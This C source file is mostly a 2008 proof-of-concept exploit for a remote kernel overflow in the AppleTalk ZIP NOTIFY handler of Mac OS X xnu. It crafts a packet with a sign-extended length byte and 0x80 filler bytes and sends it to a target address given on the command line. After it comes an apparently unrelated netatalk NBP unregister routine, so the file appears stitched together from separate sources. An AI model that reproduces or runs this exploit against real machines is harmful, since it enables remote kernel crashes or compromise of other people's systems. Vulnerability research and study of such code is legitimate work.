int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu <= 1228.3.13 appletalk zip-notify remote kernel overflow PoC\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc < 3)
{
fprintf (stderr, "Usage: %s <dst addr> <zone> [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLETALK;
daddr.sat_port = 6;
if ((fd = netddp_open (argc > 3 ? &saddr
: NULL, NULL)) < 0)
{
fprintf (stderr, "* netddp_open failed\n");
exit (EXIT_FAILURE);
}
printf ("Appletalk dst: %s, ", argv[1]);
if (argc > 3)
printf ("src: %s, ", argv[3]);
printf ("zone: %s... ", argv[2]);
p = buf;
*p++ = DDPTYPE_ZIP;
*p++ = ZIPOP_NOTIFY; /* ZIP NOTIFY */
*p++ = 0x00;
*p++ = 0x00; /* pad */
*p++ = 0x00;
*p++ = 0x00;
*p++ = 0x00;
zlen = strlen (argv[2]);
*p++ = zlen;
memcpy (p, argv[2], zlen);
p += zlen;
*p++ = 0x80; /* >= 0x80 sign extended :(
* < 0x80 not enough to hit anything useful,
* except maybe ifPort...
*/
memset (p, 0x41, 0x80);
p += 0x80;
if (netddp_sendto (fd, buf, p - buf, 0, (struct sockaddr *) &daddr,
sizeof (struct sockaddr_at)) < 0)
{
fprintf (stderr, "* netddp_sendto failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
return (EXIT_SUCCESS);
}
int nbp_unrgstr(const char *obj,const char *type,const char *zone, const struct at_addr *addr)
{
struct sockaddr_at to;
struct nbphdr nh;
struct timeval timeout;
fd_set readfd;
struct servent *se;
char *data;
int s, cc;
SOCKLEN_T namelen;
memset(&to, 0, sizeof(to));
if ((s = netddp_open(&to, NULL)) < 0)
return -1;
data = nbp_send;
*data++ = DDPTYPE_NBP;
nh.nh_op = NBPOP_UNRGSTR;
nh.nh_cnt = 1;
nh.nh_id = ++nbp_id;
memcpy( data, &nh, SZ_NBPHDR );
data += SZ_NBPHDR;
memset(data, 0, SZ_NBPTUPLE);
data += SZ_NBPTUPLE;
if ( obj ) {
if (( cc = strlen( obj )) > NBPSTRLEN ) return( -1 );
*data++ = cc;
memcpy( data, obj, cc );
data += cc;
} else {
*data++ = 0;
}
if ( type ) {
if (( cc = strlen( type )) > NBPSTRLEN ) return( -1 );
*data++ = cc;
memcpy( data, type, cc );
data += cc;
} else {
*data++ = 0;
}
if ( zone ) {
if (( cc = strlen( zone )) > NBPSTRLEN ) return( -1 );
*data++ = cc;
memcpy( data, zone, cc );
data += cc;
} else {
*data++ = 0;
}
memset( &to, 0, sizeof( struct sockaddr_at ));
to.sat_family = AF_APPLETALK;
if (addr)
memcpy(&to.sat_addr, addr, sizeof(struct at_addr));
#ifdef BSD4_4
to.sat_len = sizeof( struct sockaddr_at );
#endif /* BSD4_4 */
if ( nbp_port == 0 ) {
if (( se = getservbyname( "nbp", "ddp" )) == NULL ) {
nbp_port = 2;
} else {
nbp_port = ntohs( se->s_port );
}
}
to.sat_port = nbp_port;
if ( netddp_sendto( s, nbp_send, data - nbp_send, 0,
(struct sockaddr *)&to,
sizeof( struct sockaddr_at )) < 0 ) {
goto unregister_err;
}
FD_ZERO( &readfd );
FD_SET( s, &readfd );
timeout.tv_sec = 2;
timeout.tv_usec = 0;
if (( cc = select( s + 1, &readfd, NULL, NULL, &timeout )) < 0 ) {
goto unregister_err;
}
if ( cc == 0 ) {
errno = ETIMEDOUT;
goto unregister_err;
}
namelen = sizeof( struct sockaddr_at );
if (( cc = netddp_recvfrom( s, nbp_recv, sizeof( nbp_recv ), 0,
(struct sockaddr *)&to, &namelen )) < 0 ) {
goto unregister_err;
}
netddp_close( s );
data = nbp_recv;
if ( *data++ != DDPTYPE_NBP ) {
return( -1 );
}
memcpy( &nh, data, SZ_NBPHDR );
if ( nh.nh_op != NBPOP_OK ) {
return( -1 );
}
return( 0 );
unregister_err:
netddp_close(s);
return -1;
}
